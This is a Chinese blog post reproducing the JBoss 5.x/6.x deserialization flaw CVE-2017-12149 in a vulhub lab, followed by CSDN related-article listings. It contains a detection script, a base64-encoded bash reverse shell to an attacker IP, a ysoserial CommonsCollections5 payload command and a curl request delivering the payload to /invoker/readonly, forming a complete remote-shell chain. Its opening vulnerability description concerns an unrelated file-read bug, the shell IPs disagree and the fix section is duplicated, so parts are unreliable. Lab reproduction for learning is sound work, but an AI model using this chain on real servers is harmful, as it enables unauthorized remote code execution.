JBoss-5.x6.x-反序列化(CVE-2017-12149)

最新推荐文章于 2024-05-12 20:20:06 发布
最新推荐文章于 2024-05-12 20:20:06 发布
阅读量854 收藏
点赞数 1
分类专栏: vulhub 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55654781/article/details/127141294
版权

漏洞描述

由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。

kali 环境配置

安装https协议、CA证书、dirmngr

apt-get update

apt-get install -y apt-transport-https ca-certificates

apt-get install dirmngr

添加GPG密钥并添加更新源

curl -fsSL https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/gpg | sudo apt-key add -

echo ‘deb https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/ buster stable’ | sudo tee /etc/apt/sources.list.d/docker.list

系统更新以及安装docker

apt-get update&&apt install docker-ce

启动docker服务器 和compose

service docker start || apt install docker-compose

下载安装vulhub

git clone https://github.com/vulhub/vulhub.git

漏洞复现

启动环境/vulhub-master/jboss/CVE-2017-12149

docker-compose up -d

初始化完成后 访问 ip:端口号

在这里插入图片描述

使用python脚本进行漏洞检测

python cve-2017-12149_poc.py http://192.168.1.129:8080/

poc:
import requests
import sys

if len(sys.argv)!=2:
    print('+---------------------------------------------------------------+')
    print('+ DES: by zhzyker as https://github.com/zhzyker/exphub          +')
    print('+---------------------------------------------------------------+')
    print('+ USE: python <filename> <url>                                  +')
    print('+ EXP: python cve-2017-12149_poc.py http://freeerror.org:8080   +')
    print('+ VER: Jboss AS 5.X                                             +')
    print('+      Jboss AS 6.X                                             +')
    print('+---------------------------------------------------------------+')
    sys.exit()
url = sys.argv[1]

vulurl = url+"/invoker/readonly"

headers = {
'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0",
'Accept': "*/*",
'Content-Type': "application/json",
'X-Requested-With': "XMLHttpRequest",
'Connection': "close",
'Cache-Control': "no-cache"
}


try:
    r =requests.post(vulurl, headers=headers, verify=False)
    e=r.status_code
except:
    print ("[-] Target "+url+" Not CVE-2017-12149 Good Luck")
    sys.exit()
if e == 500:
    print ("[+] Target "+url+" Find CVE-2017-12149  EXP:https://github.com/zhzyker/exphub")
else: 
    print ("[-] Target "+url+" Not CVE-2017-12149 Good Luck")
    exit()

在这里插入图片描述

设置接收shell的ip和端口

bash -i >& /dev/tcp/192.168.1.12/9999 0>&1
base64加密  YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTMwLzk5OTkgMD4mMQ==
编译 bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTMwLzk5OTkgMD4mMQ==}{base64,-d}|{bash,-i}

使用ysoserial生成序列化数据,并重定向到poc.ser文件 (ysoserial.jar需要下载)

java -jar ysoserial.jar CommonsCollections5 "bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTMwLzk5OTkgMD4mMQ==}{base64,-d}|{bash,-i}" > poc.ser

在这里插入图片描述

开启nc监听

nc -lvvp 9999

通过二进制POST方式发送攻击载荷到 /invoker/readonly

curl http://192.168.1.129:8080/invoker/readonly --data-binary @poc.ser

反弹shell

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MnUFbfUc-1664681180763)(C:/img/JBoss反序列化/4.png)]

修复方案

  1. 不需要 http-invoker.sar 组件的用户可直接删除此组件。
  2. 添加如下代码至 http-invoker.sar 下 web.xml 的 security-constraint 标签中,对 http invoker 组件进行访问控制:
 <url-pattern>/*</url-pattern>

删除此组件。
2. 添加如下代码至 http-invoker.sar 下 web.xml 的 security-constraint 标签中,对 http invoker 组件进行访问控制:

 <url-pattern>/*</url-pattern>
bqAngus
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2017-12149JBOSSas6.X序列(弹shell版)
08-08
CVE-2017-12149是一个针对JBOSS Application Server 6.x版本的严重安全漏洞,它涉及到了Java对象的序列过程。在Java中,序列是将之前序列的对象状态恢复到可操作的Java对象的过程。然而,如果这个过程没有...
jboss-4.0.5.GA.zip
10-25
在使用"jboss-4.0.5.GA.zip"这个压缩包时,用户需要先将其解压,然后按照官方文档或者社区教程进行配置,包括但不限于设置环境变量、配置服务器端口、部署应用程序等步骤。在开发和部署过程中,理解并掌握上述知识点...
JBOSS序列漏洞
weixin_52206305的博客
07-05 3894
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。 经典的JBoss序列漏洞,JBoss在请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。访问http://ip+端口/invoker/JMXInvokerServlet 如果出现下载提示框,就证明可能存在漏洞。该漏洞出现在请求中访问http://ip+端口/如果出现该页面就表示可能存在漏洞 该漏洞出现在/invoker/rea
vulhub漏洞复现-jboss序列漏洞复现
weixin_45095113的博客
12-21 648
vulhub漏洞复现-jboss序列漏洞
Jboss 序列 CVE-2017-12149
最新发布
npc88888的博客
05-12 415
JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。在/invoker/readonly路径下,攻击者可以构造序列代码传入服务器进行序列,由于没有对序列操作进行任何检测,导致攻击者可以执行任意代码。
渗透测试-JBoss 5.x/6.x序列漏洞
道阻且长,行则将至。
07-08 1728
漏洞概述 2017年8月30日,Redhat公司发布了一个JbossAS 5.x系统的远程代码执行严重漏洞通告,相应的漏洞编号为 CVE-2017-12149。近期有安全研究者发现JbossAS 6.x也受该漏洞影响,攻击者可能利用此漏洞无需用户验证在系统上执行任意命令。 类型 描述 漏洞名称 JBOSSAS5.x/6.x序列命令执行漏洞 威胁类型 远程命令执行 威胁等级 高 漏洞ID CVE-2017-12149 受影响系统及应用版本 Jboss AS 5.x、Jbos
JBoss-4.x-JBossMQ-JMS-序列
bqnagus
10-02 470
JBoss-4.x-JBossMQ-JMS-序列
jboss jar包snowdrop-vfs.jar和jboss-logging.jar
11-17
其次,"jboss-logging.jar" 是JBoss提供的日志框架,它为开发者提供了丰富的日志功能,包括不同级别的日志记录(如DEBUG、INFO、WARN等),以及日志输出的定制。在整合Spring时,可能会遇到日志系统的冲突,因为...
jboss-threads-3.1.0.Final-API文档-中文版.zip
05-09
赠送jar包:jboss-threads-3.1.0.Final.jar; 赠送原API文档:jboss-threads-3.1.0.Final-javadoc.jar; 赠送源代码:jboss-threads-3.1.0.Final-sources.jar; 赠送Maven依赖信息文件:jboss-threads-3.1.0.Final....
Jboss Application Server序列命令执行漏洞利用工具(CVE-2017-12149)
07-23
该漏洞主要影响JBoss AS 7.x和EAP 6.x版本,这些版本中包含了`org.jboss.remoting3.protocol.ser`包,该包处理序列时存在缺陷。攻击者可以通过发送特制的序列对象到服务器的RMI注册表,触发恶意代码执行。RMI...
JAVA序列jboss 进入后台(及送JAVA序列工具和中国cai dao)
12-10
JAVA序列教程,利用JAVA序列软件进行检测,寻找,已经涉及到部分CMD命令和寻找网页IP,以及远程登陆简单介绍
Java序列漏洞利用工具(WebLogic&Jboss)
01-01
使用注意: 1. WebLogic弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 弹shell部分更完美,不再加载远程war包,直接发包完成弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
jboss-CVE-2017-12149
01-22
Jboss序列漏洞利用工具,CVE-2017-12149。Jboss序列漏洞利用工具,CVE-2017-12149。
CVE-2017-12149 复现及修复
weixin_46580614的博客
07-24 5656
CVE-2017-12149 复现及修复 漏洞名称:JBOOS AS 6.X 序列漏洞 CVE编号:CVE-2017-12149 漏洞等级:高危 影响版本:5.x和6.x版本 漏洞描述及原理:2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的序列远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列数据流进行序列,导致
一次老版本jboss序列漏洞的利用分析
C20220511的博客
09-28 1218
所以我们直接利用ysoserial的Hibernate1利用链是不能成功的,但是仔细对Hibernate1利用链进行分析可以看出漏洞利用过程中的调用栈中并没有涉及到上述不存在的类,上述不存在的类主要用于设置一些类的属性字段,可以通过其他类来代替。这里可以看出jboss中引入的是CommonsCollections2.1的版本,而一般我们平时能利用的版本都是3.x。调试序列利用链的代码是一个很麻烦的事情,有兴趣的小伙伴可以把我上面的代码去跟一下,其中主要用到的调用过程如下。
java序列漏洞 poc_通过JBoss序列CVE-2017-12149)浅谈Java序列漏洞
weixin_29496661的博客
02-13 396
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。前段时间学校学习J2EE,用到了jboss,顺便看了下jboss的序列,再浅谈下序列漏洞。Java序列,简而言之就是把java对象转为字节序列的过程。而序列话则是再把字节序列恢复为java对象的过程,然而就在这一转一变得过程中,程序员的过滤不严格,就可以导致攻击者恶意构...
漏洞复现系列--JBOSS序列命令执行CVE-2017-12149
梦之旅行地
05-08 331
一、漏洞影响范围 漏洞影响5.x和6.x版本的JBOSSAS 二、复现过程 1.1.1.1 公网vps,用来接收弹的shell 2.2.2.2 被攻击的jboss服务器 1、复现环境用的vulhub,直接docker构建下就可以 cd CVE-2017-12149 docker compose up -d 2、docker构建好以后,启动docker docker start 44a...
web.xml ejb-jar.xml jboss-web.xml 关系
05-30
web.xml、ejb-jar.xml和jboss-web.xml是三个不同的配置文件,用于在Java Web应用中配置Web组件、EJB组件和JBoss Web容器。 web.xml文件用于配置Web组件,包括Servlet、Filter、Listener等。它通常位于Web应用的WEB-INF目录下。 ejb-jar.xml文件用于配置EJB组件,包括EJB接口、EJB实现类、事务管理、安全策略等。它通常位于EJB组件的META-INF目录下。 jboss-web.xml文件用于配置JBoss Web容器,包括Web上下文、虚拟主机、安全域等。它通常位于Web应用的META-INF目录下。 这三个配置文件之间的关系如下: 1. 在Web应用中使用EJB组件时,需要在web.xml文件中声明EJB的引用,指定EJB的JNDI名称。 2. 在EJB组件中使用Web组件时,需要在ejb-jar.xml文件中声明Web组件的引用,指定Web组件的JNDI名称。 3. 在Web应用中使用JBoss Web容器的特性时,需要在jboss-web.xml文件中进行相应的配置。 需要注意的是,Web应用中的web.xml文件和EJB组件中的ejb-jar.xml文件是必须的,而jboss-web.xml文件是可选的。如果不需要使用JBoss Web容器的特性,可以不编写jboss-web.xml文件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值